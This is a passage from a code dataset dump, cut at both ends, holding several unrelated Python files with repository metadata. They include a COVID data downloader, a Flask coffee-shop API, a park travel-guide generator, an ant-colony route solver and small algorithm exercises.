n_angle_hist, n_acc_hist, n_acc2_hist, n_cos_hist, n_acc_angle_hist))\n\ndef main():\n trips = read_trips(sys.argv[1])\n velocities = [compute_velocity(trip) for trip in trips]\n speeds = [compute_scalar(v) for v in velocities]\n 
features = np.array([acceleration_features(speed) for speed in speeds])\n print(features)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"smoussa/seahorse-ml","sub_path":"feature_extraction/acceleration_features.py","file_name":"acceleration_features.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42390428252","text":"import csv\nimport requests\n\ndef get_data(url=None,file_path = None):\n CSV_URL = url\n with requests.Session() as s:\n download = s.get(CSV_URL)\n\n decoded_content = download.content.decode('utf-8')\n\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n my_list = list(cr)\n\n with open(file_path,'w', newline='') as file:\n writer = csv.writer(file)\n for row in my_list:\n writer.writerow(row)\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us-counties.csv', file_path='us-counties-refactored.csv')\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us-states.csv',file_path='us-states-refactored.csv')\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us.csv',file_path='us-refactored.csv')","repo_name":"JustCasuallyJames/Covid-Tracker","sub_path":"scripts/data_scrapper.py","file_name":"data_scrapper.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19951389691","text":"\n\"\"\"\nCreated on Thu Jul 16 11:15:06 2015\n\n@author: Antoine\n\"\"\"\n\nimport os\n\n\ndef file_infos(excelfile_name):\n filename = os.path.split(excelfile_name)[1].split('.')[0] # name of the file, without extension\n filename = filename.lower()\n file_version = os.path.dirname(excelfile_name)\n file_version = file_version[-4:]\n file_source = 'INSEE Comptabilite Nationale'\n file_source_link = 'http://www.insee.fr/fr/indicateurs/cnat_annu/archives/comptes_annee_{}.zip'.format(file_version)\n\n skip = 0\n\n # TEE (tableau economique d'ensemble) file\n if filename.startswith('tee'):\n year = str(filename[-4:])\n agent = 'economie'\n title = 'TEE'\n tee_flag = 1 # 'tee'\n\n # Non TEE file\n else:\n year = ''\n agent = ''\n title = ''\n tee_flag = 0 # 'not tee'\n\n # could be automatized (in the parser method by reading the first cell and cutting in 3: name of file, title, agent)\n if filename == 't_7101':\n agent = 'S11' # (societes non financieres)\n title = 'Compte des societes non financieres'\n elif filename == 't_7201':\n agent = 'S12' # (societes financieres)\n title = 'Compte des societes financieres'\n elif filename == 't_7301':\n agent = 'S13' # (administrations publiques)\n title = 'Compte des administrations publiques'\n elif filename == 't_7401':\n agent = 'S14' # (menages)\n title = 'Compte des menages'\n elif filename == 't_7501':\n agent = 'S15' # (isbl)\n title = 'Compte des institutions sans but lucratif au service des menages'\n elif filename == 't_7601':\n agent = 'S2' # (reste du monde)\n title = 'Operations avec le reste du monde'\n elif filename == 't_1115':\n agent = 'S1'\n title = 'Produit intérieur brut et revenu national brut par habitant'\n\n # to be completed for all the files of interest in the folder\n # elif filename == 't_3101':\n # agent = 'S13' # (administrations publiques)\n # title = 'Dette des administrations publiques (S13) au sens de Maastricht et sa répartition par sous-secteur'\n # elif filename == 't_3201':\n # agent = 'S13' # 
(administrations publiques)\n # title = 'Dette et recettes des administrations publiques'\n\n else:\n skip = 1\n\n if skip == 0:\n parameters = dict()\n parameters = {'agent': agent, 'title': title, 'year': year, 'filename': filename,\n 'tee_flag': tee_flag, 'source': file_source, 'link': file_source_link, 'version': file_version}\n else:\n parameters = False\n\n return parameters\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/comptes_nationaux/get_file_infos.py","file_name":"get_file_infos.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24167978100","text":"from datetime import datetime\n\n\ndef get_timestamp():\n return datetime.now().strftime((\"%Y-%m-%d %H:%M:%S\"))\n\n\n# Data to serve with our API\nCOUNTRY = {\n \"Norway\": {\n \"name\": \"Norway\",\n \"chapters_involved\": [],\n \"chapters_not_involved\": [],\n \"treaties_involved\": [],\n \"treaties_not_involved\": [],\n \"timestamp\": get_timestamp(),\n \"date_first_appearance\": \"\",\n \"text\": \"\",\n },\n \"Sweden\": {\n \"name\": \"Sweden\",\n \"chapters_involved\": [],\n \"chapters_not_involved\": [],\n \"treaties_involved\": [],\n \"treaties_not_involved\": [],\n \"timestamp\": get_timestamp(),\n \"date_first_appearance\": \"\",\n \"text\": \"\",\n },\n}\n\n# Create a handler for our read (GET) COUNTRY\ndef read():\n \"\"\"\n This function responds to a request for /api/COUNTRY\n with the complete lists of COUNTRY\n\n :return: sorted list of COUNTRY\n \"\"\"\n # Create the list of COUNTRY from our data\n return [COUNTRY[key] for key in sorted(COUNTRY.keys())]\n","repo_name":"DataForGood-Norway/un_treaties","sub_path":"un_treaties/rest_api/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27186085510","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nN = int(input())\nD = input().split(\" \")\nM = int(input())\nT = input().split(\" \")\n\n\nif len(D) < len(T):\n\tprint(\"NO\")\n\texit(0)\n\nD.sort()\nT.sort()\n\ni = 0\nj = 0\n\nwhile True:\n\tif i > M-1:\n\t\tprint(\"YES\")\n\t\tbreak\n\n\telif D[j] == T[i] :\n\t\ti += 1\n\t\tj += 1\n\n\telse:\n\t\tj += 1\n\n\t\tif j > N - 1:\n\t\t\tprint(\"NO\")\n\t\t\tbreak\n\n\t\telif D[j] > T[i]:\n\t\t\tprint(\"NO\")\n\t\t\tbreak\n\n\n\n\n\n","repo_name":"banboooo044/AtCoder","sub_path":"DDCC_2017/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898622468","text":"#Leetcode 5\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n result = \"\"\n result_length = 0\n #algo: Two ways:\n # 1. check first and last char, and move inwards\n # 2. 
select a middle, and check chars on both sides of middle, and move outwards\n # Here I am using the second algo\n for i in range(len(s)):\n \n #For even length string\n l,r=i,i+1\n while l >=0 and r < len(s) and s[l] == s[r]:\n if (r-l+1) > result_length:\n result = s[l:r+1]\n result_length = (r-l+1)\n l -= 1 #going outwards\n r += 1 \n\n #For odd length string\n l,r = i,i\n while l >=0 and r < len(s) and s[l] == s[r]:\n if (r-l+1) > result_length:\n result = s[l:r+1]\n result_length = (r-l+1)\n l -= 1 #going outwards\n r += 1\n return result\n \n #Time = O(n^2)\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"strings/LongestPaliandromicSubstring.py","file_name":"LongestPaliandromicSubstring.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37728198266","text":"# Code/logic adapted from Professor Clara James, Information Technology 1150: Programming and Logic / Al Sweigart,\n# Automate the Boring Stuff With Python.\n\"\"\"\nThis program will fetch and arrange data from the Minnesota State Park API server,\nformat and save park info in a Word document and create a travel guide.\nAlternatively produces a sample guide if network or server connection is unavailable.\n\"\"\"\nimport requests\nimport docx\nfrom docx import Document\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\nimport random\nimport plotly.graph_objects as go\nimport plotly.express as px\n\ndocument = docx.Document()\n\n\ndef main():\n \"\"\"Outline data structure and save final document. \"\"\"\n document.add_paragraph('Minnesota State Park Travel Guide', 'Title')\n\n response = master_park_data()\n park_dict = {}\n for mn_state_park in response:\n park_names_key = mn_state_park['name']\n park_id_value = mn_state_park['park_id']\n park_dict[park_names_key] = park_id_value\n park_ids_list = list(park_dict.values())\n\n number_of_parks = 5 # Guide should contain at least 5 parks\n random_park_id_selection = choose_rand_park(number_of_parks, park_ids_list)\n for park_id in random_park_id_selection:\n each_park = detailed_park_data(park_id)\n park_name = each_park['name']\n park_images = each_park['park_images']\n download_images(park_images, park_name)\n\n park_title_and_header_img(each_park)\n park_text_info(each_park)\n park_gallery(each_park)\n contact_information(each_park)\n open_street_park_map(each_park)\n document.add_paragraph()\n\n document.save('Minnesota_State_Park_Travel_Guide_Final.docx')\n\n\ndef master_park_data():\n \"\"\"Attempt connection to the server and request master list of parks\n and their IDs. \"\"\"\n api_mn_state_parks = 'https://mn-state-parks.herokuapp.com/api/list'\n try:\n data = requests.get(api_mn_state_parks).json()\n return data\n except:\n print('There was an error requesting park data. Check network connection.')\n\n\ndef detailed_park_data(park_id):\n \"\"\"Request detailed information for each park. \"\"\"\n api_park_detail = f'https://mn-state-parks.herokuapp.com/api/{park_id}'\n try:\n data = requests.get(api_park_detail).json()\n return data\n except:\n print('There was an error requesting park information. Check network '\n 'connection.')\n\n\ndef choose_rand_park(total_parks, park_ids_list):\n \"\"\"Use random module to choose parks from park list, return five random park IDs. 
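A one-call alternative (illustrative note, assuming total_parks <= len(park_ids_list)): random.sample(park_ids_list, total_parks) also draws the same number of unique IDs. 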
\"\"\"\n random_park_id_selection = []\n while total_parks > 0:\n chosen_park = random.choice(park_ids_list)\n if chosen_park not in random_park_id_selection:\n random_park_id_selection.append(chosen_park)\n total_parks -= 1\n\n return random_park_id_selection\n\n\ndef park_title_and_header_img(park_details):\n \"\"\"Add park name and image header to document. \"\"\"\n park_name = park_details['name']\n document.add_paragraph(park_name, 'Heading 1')\n document.add_picture(f'{park_name}_0.jpg', width=docx.shared.Inches(6),\n height=docx.shared.Inches(2.49))\n\n\ndef park_text_info(park_details):\n \"\"\"Create main body of text in the document for given park IDs. \"\"\"\n\n highlights = park_details['highlights']\n document.add_paragraph('Highlights', 'Heading 2')\n for highlight in highlights:\n document.add_paragraph(highlight, 'List Bullet')\n\n park_information = park_details['park_information']\n for information_category, category_details in park_information.items():\n document.add_paragraph(f'{information_category}', 'Heading 2')\n document.add_paragraph(f'{category_details}', 'Normal')\n\n\ndef park_gallery(park_details):\n \"\"\"Add remaining images to the document. \"\"\"\n park_name = park_details['name']\n\n for index in range(6): # Max 6 additional images per park in guide\n document.add_picture(f'{park_name}_{index+1}.jpg',\n width=docx.shared.Inches(5.47),\n height=docx.shared.Inches(2.87))\n last_paragraph = document.paragraphs[-1]\n last_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n # Code to center align image in docx\n # https://stackoverflow.com/questions/26474551/python-docx-lib-center-align-image\n\n\ndef open_street_park_map(park_details):\n \"\"\"Request tile map using Mapbox open street map - does not require access token.\n Downloads image and adds map to travel guide. \"\"\"\n park_name = park_details['name']\n lat = park_details['location']['latitude']\n lon = park_details['location']['longitude']\n\n fig = px.scatter_mapbox(\n lat=[lat],\n lon=[lon],\n color_discrete_sequence=[\"darkviolet\"],\n zoom=4.1,\n width=420,\n height=300\n )\n fig.update_traces(marker=dict(size=9),\n selector=dict(mode='markers'))\n fig.update_layout(mapbox_style=\"open-street-map\")\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n fig.write_image(f'{park_name}_map.png')\n\n document.add_paragraph('Map', 'Heading 2')\n document.add_picture(f'{park_name}_map.png')\n last_paragraph = document.paragraphs[-1]\n last_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n\ndef contact_information(park_details):\n \"\"\"Add contact information text to the document. 
\"\"\"\n document.add_paragraph('Contact Information', 'Heading 2')\n\n document.add_paragraph('Address', 'Heading 3')\n document.add_paragraph(park_details['address'], 'Normal')\n\n document.add_paragraph('Website', 'Heading 3')\n document.add_paragraph(park_details['url'], 'Normal')\n\n\ndef download_images(park_images, park_name):\n \"\"\"Take URLs from park dictionary and request, download, save and index images\n from MN park API server.\"\"\"\n for index, url in enumerate(park_images):\n chosen_img = requests.get(url)\n filename = f'{park_name}_{index}.jpg'\n with open(filename, 'wb') as file:\n for chunk in chosen_img.iter_content():\n file.write(chunk)\n\n\nmain()\n","repo_name":"rwalk651/ProgrammingLogicAndDesign","sub_path":"MN_Park_Guide_With_Street_Map_V2_Email_Edits.py","file_name":"MN_Park_Guide_With_Street_Map_V2_Email_Edits.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5783132854","text":"import keyboard\nfrom loguru import logger\nfrom djitellopy import Tello\nfrom tello_fly import TelloFly\nfrom tello_controller import TelloController\n\n\ndef main():\n logger.info(\"Initializing pygame...\")\n\n keyboard.init()\n\n logger.info(\"Pygame initialized\")\n logger.info(\"Connecting tello...\")\n\n tello = Tello()\n tello.connect()\n\n logger.info(\"Tello connected\")\n logger.info(f\"Remaining battery: {tello.get_battery()}\")\n\n controller = TelloController()\n fly = TelloFly(tello, controller)\n\n fly.fly(battery=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gotsulyakk/tello-programming","sub_path":"2_object_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32146157684","text":"import pants\nimport math\nimport random\nimport csv\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom geopy.distance import vincenty\n\nnodes = []\n\n#Create the map\ndef createWorld():\n\treturn pants.World(nodes, calculateDistance)\n\t\n#Init the solver\ndef createSolver():\n\treturn pants.Solver()\n\n#Print the results\t\ndef printSolution(solver,world):\n\tsolutions = solver.solutions(world)\n\t\n\tbestSolutionLength = sys.maxsize\n\tfor solution in solutions:\n\t\tif solution.distance < bestSolutionLength:\n\t\t\tbestSolution = solution\n\t\t\tbestSolutionLength = solution.distance\n\t\tprint('Ants colony found a way ! 
Need %d meters to make it all' % solution.distance)\n\tprint('')\n\tprint('===============================')\n\tprint('Best solution is %d meters' % bestSolution.distance)\n\tprint('===============================')\n\treturn bestSolution;\n\t\n#Calculate distance using vincenty(geopy) lib for lat/long distance\ndef calculateDistance(a,b):\n\treturn round(vincenty(a,b).meters)\n\t\n#Open Csv file\ndef readCsv():\n\tfile = open('test.csv','r')\n\treturn csv.reader(file ,delimiter=',',quotechar='\"')\n\t\n#Main function\ndef main():\t\n\t#init data\n\tnodesTemp = []\n\treader = readCsv()\n\tnbInvalid = 0\n\tnbDuplicate = 0\n\t\n\t#read csv\n\tfor row in reader:\t\n\t\ttabRow= row\n\t\ttry :\n\t\t\tif float(row[len(row) -2])<90 and float(row[len(row) -2])>-90 and float(row[len(row)-3])<180 and float(row[len(row)-3])>-180 :\n\t\t\t\tnodesTemp.append((float(row[len(row) - 2]),float(row[len(row) -3])))\n\t\t\telse :\n\t\t\t\tprint('errors')\n\t\t\t\tnbInvalid += 1\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('error')\n\t\t\tnbInvalid += 1\n\t\t\n\t#\n\tfor elem in nodesTemp:\n\t\tif elem not in nodes:\n\t\t\tnodes.append(elem)\n\t\telse :\n\t\t\tnbDuplicate += 1\n\t#for debug\n\t#print(nodes)\n\t\n\t#print the csv parsing result\n\tprint('===============================')\n\tprint('%d valid nodes found in csv' % len(nodes))\t\n\tprint('%d invalid nodes found in csv' % nbInvalid)\t\n\tprint('%d duplicate geoloc found in csv' % nbDuplicate)\t\n\tprint('===============================')\n\tprint('')\n\t\n\tworld = createWorld()\n\tsolver = createSolver()\n\tbestSolution = printSolution(solver,world)\n\tcreateGraph(bestSolution)\n\tinput('exit?')\n\t\ndef createGraph(solution):\n    noeudsVisiter = solution.tour\n    G = nx.Graph()\n    # G.add_edges_from(noeudsVisiter)\n    for noeud in noeudsVisiter:\n        G.add_edge(format(noeud[0]), format(noeud[1]), weight=0.6)\n    plt.subplot(121)\n\n    node_positions = nx.spring_layout(G) # positions for all nodes\n    nx.draw_networkx(G, pos=node_positions, node_size=100, node_color='red', edge_color=\"green\", with_labels=True,\n                     alpha=1)\n\n    edge_labels = nx.get_edge_attributes(G, 'sequence')\n    nx.draw_networkx_edge_labels(G, pos=node_positions, edge_labels=edge_labels, font_size=20)\n    nx.draw_networkx_nodes(G, pos=node_positions, node_size=20)\n    nx.draw_networkx_edges(G, pos=node_positions, alpha=0.4)\n\n    plt.xticks([])\n    plt.yticks([])\n\n    plt.text(0.5, 0.5, G, ha=\"center\", va=\"center\", size=24, alpha=.5)\n    plt.title('Visited nodes', size=15)\n\n    plt.ylabel(\"Y\")\n    plt.xlabel(\"X\")\n    plt.axis('off')\n\n    plt.subplot(122)\n    degree_sequence = sorted([d for n, d in G.degree()], reverse=True)\n    dmax = max(degree_sequence)\n\n    # draw graph in inset\n    plt.axis('off')\n    plt.show()\n\n\t\nmain()\n","repo_name":"HugoB0ss/TP-Ants-fourmiale","sub_path":"tp.py","file_name":"tp.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3444255755","text":"from django.urls import path\nfrom .views import *\nfrom django.views.generic.base import TemplateView\n\nurlpatterns = [\n    path('', HomeView.as_view(), name='home'),\n    path('register/',Register.as_view(), name='register'),\n    path('login/',LoggingIn.as_view() , name='login'),\n    path('logout/',log_out , name='logout'),\n    path('category/<int:pk>/',CategoryDetail.as_view() , name='category'),\n    path('category_list/',CategoryList.as_view() , name='categories'),\n    path('book_table/',BookTable.as_view() , name='book_table'),\n    
path('subscribe/',Subscription.as_view() , name='subscribe'),\n    \n]","repo_name":"Nickolasso2/Sportbar","sub_path":"app_sportbar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25692766983","text":"import os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\nfrom .database.models import db_drop_and_create_all, setup_db, Drink\nfrom .auth.auth import AuthError, requires_auth\n\napp = Flask(__name__)\nsetup_db(app)\nCORS(app)\n\n'''\n@DONE uncomment the following line to initialize the database\n!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH\n!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN\n'''\ndb_drop_and_create_all()\n\n# ROUTES\n'''\n@DONE implement endpoint\n    GET /drinks\n        it should be a public endpoint\n        it should contain only the drink.short() data representation\n    returns status code 200 and json {\"success\": True, \"drinks\": drinks}\n        where drinks is the list of drinks\n        or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks')\ndef get_drinks():\n    \"\"\"\n    :returns all drinks in json format.\n    No authentication nor authorization needed\n    \"\"\"\n    drinks = Drink.query.all()\n\n    return jsonify({\n        \"success\": True,\n        \"drinks\": [drink.short() for drink in drinks]\n    }), 200\n\n\n'''\n@DONE implement endpoint\n    GET /drinks-detail\n        it should require the 'get:drinks-detail' permission\n        it should contain the drink.long() data representation\n    returns status code 200 and json {\"success\": True, \"drinks\": drinks}\n        where drinks is the list of drinks\n        or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks-detail')\n@requires_auth('get:drinks-detail')\ndef get_drinks_detail(payload):\n    \"\"\"\n    :returns: all drinks in json with detailed recipe\n    only barista & managers can access it.\n    \"\"\"\n    drinks = Drink.query.all()\n\n    return jsonify({\n        \"success\": True,\n        \"drinks\": [drink.long() for drink in drinks]\n    }), 200\n\n\n'''\n@DONE implement endpoint\n    POST /drinks\n        it should create a new row in the drinks table\n        it should require the 'post:drinks' permission\n        it should contain the drink.long() data representation\n    returns status code 200 and json {\"success\": True, \"drinks\": drink}\n        where drink an array containing only the newly created drink\n        or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks', methods=['POST'])\n@requires_auth('post:drinks')\ndef post_drink(payload):\n    \"\"\"\n    Creates a new drink.\n    Only accessible for managers\n    \"\"\"\n    body = request.get_json()\n    title = body.get('title', None)\n    recipe = body.get('recipe', None)\n\n    try:\n        # Check if title and recipe included in the body\n        if title is None or recipe is None:\n            abort(422)\n\n        # Create a new drink object\n        new_drink = Drink(title=title, recipe=json.dumps(recipe))\n        new_drink.insert()\n\n        return jsonify({\n            \"success\": True,\n            \"drinks\": [new_drink.long()],\n            \"message\": \"Created Successfully\"\n        }), 200\n\n    except:\n        # In case of having errors\n        abort(422)\n\n\n'''\n@DONE implement endpoint\n    PATCH /drinks/<id>\n        where <id> is the existing model id\n        it should respond with a 404 error if <id> is not found\n        it should update the corresponding row for <id>\n        it should require the 'patch:drinks' permission\n        it should contain the drink.long() data representation\n    returns status code 200 and json 
{\"success\": True, \"drinks\": drink}\n where drink an array containing only the updated drink\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks/', methods=['PATCH'])\n@requires_auth('patch:drinks')\ndef update_drink(payload, id):\n \"\"\"\n Updates existing drink by id\n Only accessible for managers\n \"\"\"\n\n drink_to_update = Drink.query.filter_by(id=id).one_or_none()\n # Check if the drink with this id exists\n if drink_to_update is None:\n abort(404)\n body = request.get_json()\n title = body.get('title', None)\n recipe = body.get('recipe', None)\n\n # Check if the body contains at least one of the needed fields\n if title is None and recipe is None:\n abort(422)\n\n try:\n # update the title if included in the request\n if title is not None:\n drink_to_update.title = title\n\n # update the recipe if included in the request\n if recipe is not None:\n drink_to_update.recipe = json.dumps(recipe)\n drink_to_update.update()\n\n return jsonify({\n \"success\": True,\n \"drinks\": [drink_to_update.long()]\n }), 200\n except:\n # In case of failure\n abort(422)\n\n\n'''\n@DONE implement endpoint\n DELETE /drinks/\n where is the existing model id\n it should respond with a 404 error if is not found\n it should delete the corresponding row for \n it should require the 'delete:drinks' permission\n returns status code 200 and json {\"success\": True, \"delete\": id}\n where id is the id of the deleted record\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks/', methods=['DELETE'])\n@requires_auth('delete:drinks')\ndef delete_drink(payload, id):\n \"\"\"\n Deletes an existing drink by id\n Only accessible for managers\n \"\"\"\n drink_to_delete = Drink.query.filter_by(id=id).one_or_none()\n\n # Check if a drink with this id exists.\n if drink_to_delete is None:\n abort(404)\n try:\n drink_to_delete.delete()\n\n return jsonify({\n \"success\": True,\n \"delete\": id\n }), 200\n except:\n # In case of failure\n abort(422)\n\n\n# Error Handling\n'''\nExample error handling for unprocessable entity\n'''\n\n'''\n@DONE implement error handlers using the @app.errorhandler(error) decorator\n each error handler should return (with approprate messages):\n jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n'''\n\n'''\n@DONE implement error handler for 404\n error handler should conform to general task above\n'''\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Resource Not Found\"\n }), 404\n\n\n# I created this for bad json requests\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"Bad Request\"\n }), 400\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n\n@app.errorhandler(401)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": 401,\n \"message\": \"Unauthorized\"\n }), 401\n\n\n@app.errorhandler(403)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": 403,\n \"message\": \"Forbidden\"\n }), 403\n\n\n'''\n@DONE implement error handler for AuthError\n error handler should conform to general task above\n'''\n\n\n@app.errorhandler(AuthError)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error\n 
}), error.status_code\n","repo_name":"walidzakaria/coffee_shop_full_stack","sub_path":"backend/src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32739318885","text":"def solution(numbers):\n stack = []\n answer = [-1] * len(numbers)\n for idx, num in enumerate(numbers):\n while stack != []:\n i, n = stack[-1]\n if n < num:\n stack.pop()\n answer[i] = num\n else:\n break\n stack.append([idx, num])\n return answer\n\n","repo_name":"SIDED00R/Code_training","sub_path":"프로그래머스/2/154539. 뒤에 있는 큰 수 찾기/뒤에 있는 큰 수 찾기.py","file_name":"뒤에 있는 큰 수 찾기.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75063680808","text":"import spacy\n\nfrom api.models import InvertedIndex\n\n\nclass InvertedIndexSearch:\n def __init__(self):\n self.nlp = spacy.load(\"ru_core_news_sm\")\n\n def search_pages(self, query):\n pages_union = []\n\n words = []\n\n try:\n words = [self.nlp(word.lower()).text for word in query.split(\" \")]\n except Exception as e:\n pass\n\n inverted_indexes = InvertedIndex.objects.filter(token__in=words)\n\n pages = [page_array.pages for page_array in inverted_indexes]\n\n for page in pages:\n\n if len(pages_union) == 0:\n pages_union = page\n else:\n pages_union = list(set(pages_union) | set(page))\n\n return pages_union\n\n\nclass InvertedIndexService:\n def __init__(self, path):\n self.path_inverted_index = path\n\n def generate(self):\n with open(self.path_inverted_index, 'r', encoding='utf-8') as file:\n for line in file:\n line_split = line.strip(\"\\n\").strip('').split(\" \")\n\n pages = [int(i) for i in line_split[1:] if i != '']\n\n obj, created = InvertedIndex.objects.update_or_create(token=line_split[0], pages=pages)\n","repo_name":"AMiracle-creator/InfoSearch","sub_path":"demo/src/api/service/genertate_inverted_index.py","file_name":"genertate_inverted_index.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74166891687","text":"import json\nfrom pathlib import Path\nimport copy\n\ntranslate_names = {\n \"Moves\": \"m\",\n \"Level\": \"l\",\n \"Starting Move\": \"sm\",\n \"TM\": \"tm\",\n \"index\": \"i\",\n \"Abilities\": \"a\",\n \"Type\": \"t\",\n \"SR\": \"sr\",\n \"AC\": \"ac\",\n \"HP\": \"hp\",\n \"Hit Dice\": \"hd\",\n \"attributes\": \"atr\",\n \"MIN LVL FD\": \"lvl\",\n \"SKill\": \"s\",\n \"Senses\": \"sn\",\n \"Hidden Ability\": \"ha\",\n \"Evolve\": \"e\",\n \"saving_throws\": \"st\"\n }\n\n\ndef convert_names(json_data):\n json_copy = copy.deepcopy(json_data)\n for key, value in json_data.items():\n if key in translate_names:\n json_copy[translate_names[key]] = json_copy.pop(key)\n return json_copy\n\n\ndef convert_speeds(json_data):\n json_copy = copy.deepcopy(json_data)\n translate = {\"WSp\": \"w\",\n \"SSp\": \"s\",\n \"FSp\": \"f\",\n \"Climbing Speed\": \"c\",\n \"Burrowing Speed\": \"b\",\n }\n\n json_copy[\"sp\"] = {}\n for speed_from, speed_to in translate.items():\n if speed_from in json_copy:\n json_copy[\"sp\"][speed_to] = json_copy.pop(speed_from)\n return json_copy\n\n\ndef convert(path):\n with path.open(encoding=\"utf-8\") as fp:\n data = json.load(fp)\n j_copy = convert_speeds(data)\n j_copy = convert_names(j_copy)\n\n with path.open(\"w\", encoding=\"utf-8\") as fp:\n json.dump(j_copy, fp, ensure_ascii=False, 
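# num is the next greater element for everything smaller still on the stack\n                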
indent=2)\n\n\nconvert(Path(r\"E:\\projects\\repositories\\Pokedex5E\\assets\\datafiles\\pokemon\\Abomasnow.json\"))\n","repo_name":"Jerakin/Pokedex5E","sub_path":"tools/scripts/one_offs/convert_pokemon_files.py","file_name":"convert_pokemon_files.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"53"} +{"seq_id":"39013760027","text":"import os\nimport re\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\ndef readHalftimes(N_file, Q_file):\n # Read in halftimes\n with open(N_file, 'r') as f:\n N_halftimes = json.load(f)\n\n with open(Q_file, 'r') as f:\n Q_halftimes = json.load(f)\n\n\n return(N_halftimes, Q_halftimes)\n\n\ndef plot_halftimes_hist(N_halftimes, Q_halftimes):\n nh = [r[0] for r in list(N_halftimes.values())]\n nh = np.array(nh)\n qh = [r[0] for r in list(Q_halftimes.values())]\n qh = np.array(qh)\n\n fig = plt.figure()\n axN = fig.add_subplot(211)\n axN.hist(np.log(nh), bins=30, density=True)\n axN.set_xlabel('N deamidation halftime')\n axQ = fig.add_subplot(212)\n axQ.hist(np.log(qh), bins=20, density=True)\n axQ.set_xlabel('Q deamidation halftime')\n\n plt.savefig('./deamidation_halftimes.png')\n plt.close()\n\ndef sort_tripeps(tripeps, halftimes):\n \"\"\"\n Sort an array of tripeptides according to\n \"\"\"\n tripeps = np.array(tripeps)\n hts = [halftimes[trp][0] for trp in tripeps]\n hts = np.array(hts)\n ind = np.argsort(hts)\n tripeps = tripeps[ind]\n hts = hts[ind]\n return tripeps, hts\n\n\ndef group_by_bins(halftimes, Nbins, Qbins):\n for tripep, data in halftimes.items():\n halftime = data[0]\n log_halftime = np.log(halftime)\n if tripep[1] == 'N':\n for i in range(len(Nbins)-1):\n if Nbins[i] <= log_halftime < Nbins[i+1]:\n halftimes[tripep] = [halftime, i]\n if tripep[1] == 'Q':\n for i in range(len(Qbins)-1):\n if Qbins[i] <= log_halftime < Qbins[i+1]:\n halftimes[tripep] = [halftime, i+len(Nbins)-1]\n\ndef group_by_seq(halftimes, pos='right'):\n for tripep, data in halftimes.items():\n 